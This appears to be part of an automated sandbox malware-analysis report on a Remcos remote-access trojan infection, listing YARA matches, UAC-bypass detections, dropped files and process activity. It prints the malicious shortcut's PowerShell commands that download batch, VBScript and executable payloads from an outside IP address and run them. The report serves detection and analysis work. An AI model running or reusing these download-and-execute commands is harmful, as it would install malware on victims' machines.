                      Source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 19.2.cmd.exe.4f4a757.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 19.2.cmd.exe.4f04a8a.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 19.2.cmd.exe.4f49b57.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 30.2.explorer.exe.4f2cb57.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 28.2.cmd.exe.49d1a8a.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 30.2.explorer.exe.4f2d757.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 31.2.explorer.exe.4daca8a.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 28.2.cmd.exe.4a17757.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 28.2.cmd.exe.4a16b57.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 26.2.explorer.exe.4e3aa8a.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 31.2.explorer.exe.4df2757.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 31.2.explorer.exe.4df1b57.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 17.2.DZIPR.exe.35e5901.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0000001F.00000002.2928479107.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0000001E.00000002.2757772777.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: cmd.exe PID: 6600, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: cmd.exe PID: 2720, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: explorer.exe PID: 1460, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: cmd.exe PID: 3004, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: explorer.exe PID: 5388, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: explorer.exe PID: 4924, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPEDMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPEDMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPEDMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPEDMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPEDMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPEDMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Powershell drops PE file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\AUGUST.exeJump to dropped file
                      Windows Scripting host queries suspicious COM object (likely to drop second stage)
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                      Windows shortcut file (LNK) contains suspicious command line arguments
                      Source: Dlr7HYI6VL.lnkLNK file: /c powershell wget http://172.94.3.25/hello.bat -OutFile %APPDATA%/hello.bat && %APPDATA%/hello.bat
                      Wscript starts Powershell (via cmd or directly)
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbs
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ffo.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/AUGUST.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.batJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.batJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbsJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ffo.bat" "Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/AUGUST.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 23_2_6FAD0D95 NtdllDefWindowProc_W,23_2_6FAD0D95
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 23_2_6FACE5F6 NtdllDefWindowProc_W,CallWindowProcW,23_2_6FACE5F6
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 23_2_6FAD2932 _memset,NtdllDefWindowProc_W,23_2_6FAD2932
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\lnfast_x64.jobJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 16_2_00404FAA16_2_00404FAA
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 16_2_0041206B16_2_0041206B
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 16_2_0041022D16_2_0041022D
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 16_2_00411F9116_2_00411F91
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA45E7017_2_6FA45E70
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA463F017_2_6FA463F0
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA55FB717_2_6FA55FB7
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA63E3B17_2_6FA63E3B
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA5AE4517_2_6FA5AE45
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA51D8517_2_6FA51D85
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA45CA017_2_6FA45CA0
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA62CBB17_2_6FA62CBB
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA56C6C17_2_6FA56C6C
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA5686017_2_6FA56860
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA6586C17_2_6FA6586C
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA417D017_2_6FA417D0
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA4173017_2_6FA41730
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA4173917_2_6FA41739
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA6374317_2_6FA63743
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA5648C17_2_6FA5648C
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA631FF17_2_6FA631FF
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA5708C17_2_6FA5708C
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 18_2_6C515E7018_2_6C515E70
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 18_2_6C5163F018_2_6C5163F0
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 18_2_6C532CBB18_2_6C532CBB
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 18_2_6C515CA018_2_6C515CA0
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 18_2_6C521D8518_2_6C521D85
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 18_2_6C52AE4518_2_6C52AE45
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 18_2_6C533E3B18_2_6C533E3B
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 18_2_6C53374318_2_6C533743
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 18_2_6C51173118_2_6C511731
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 18_2_6C51173018_2_6C511730
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 18_2_6C5117D018_2_6C5117D0
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 18_2_6C525FB718_2_6C525FB7
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 18_2_6C53586C18_2_6C53586C
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 18_2_6C5331FF18_2_6C5331FF
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 23_2_6FAC5E7023_2_6FAC5E70
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 23_2_6FAC63F023_2_6FAC63F0
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 23_2_6FAD5FB723_2_6FAD5FB7
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 23_2_6FAC17D023_2_6FAC17D0
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 23_2_6FAC173023_2_6FAC1730
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 23_2_6FAC173123_2_6FAC1731
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 23_2_6FAE374323_2_6FAE3743
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 23_2_6FAE3E3B23_2_6FAE3E3B
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 23_2_6FADAE4523_2_6FADAE45
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 23_2_6FAD1D8523_2_6FAD1D85
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 23_2_6FAC5CA023_2_6FAC5CA0
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 23_2_6FAE2CBB23_2_6FAE2CBB
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 23_2_6FAE31FF23_2_6FAE31FF
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 23_2_6FAE586C23_2_6FAE586C
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\demhwk 7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\gps 7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\qapuwvr 7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: String function: 0040243B appears 37 times
                      Source: C:\Users\user\DZIPR.exeCode function: String function: 6FA553BC appears 48 times
                      Source: C:\Users\user\DZIPR.exeCode function: String function: 6FA550C9 appears 66 times
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: String function: 6C5253BC appears 44 times
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: String function: 6FAD50C9 appears 58 times
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: String function: 6FAD53BC appears 45 times
                      Source: 24.2.cmd.exe.5862757.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 24.2.cmd.exe.5861b57.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 26.2.explorer.exe.4e80757.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 17.2.DZIPR.exe.362a9ce.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 26.2.explorer.exe.4e7fb57.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 24.2.cmd.exe.581ca8a.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 17.2.DZIPR.exe.362b5ce.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 30.2.explorer.exe.4ee7a8a.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 19.2.cmd.exe.4f4a757.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 19.2.cmd.exe.4f04a8a.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 19.2.cmd.exe.4f49b57.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 30.2.explorer.exe.4f2cb57.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 28.2.cmd.exe.49d1a8a.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 30.2.explorer.exe.4f2d757.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 31.2.explorer.exe.4daca8a.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 28.2.cmd.exe.4a17757.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 28.2.cmd.exe.4a16b57.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
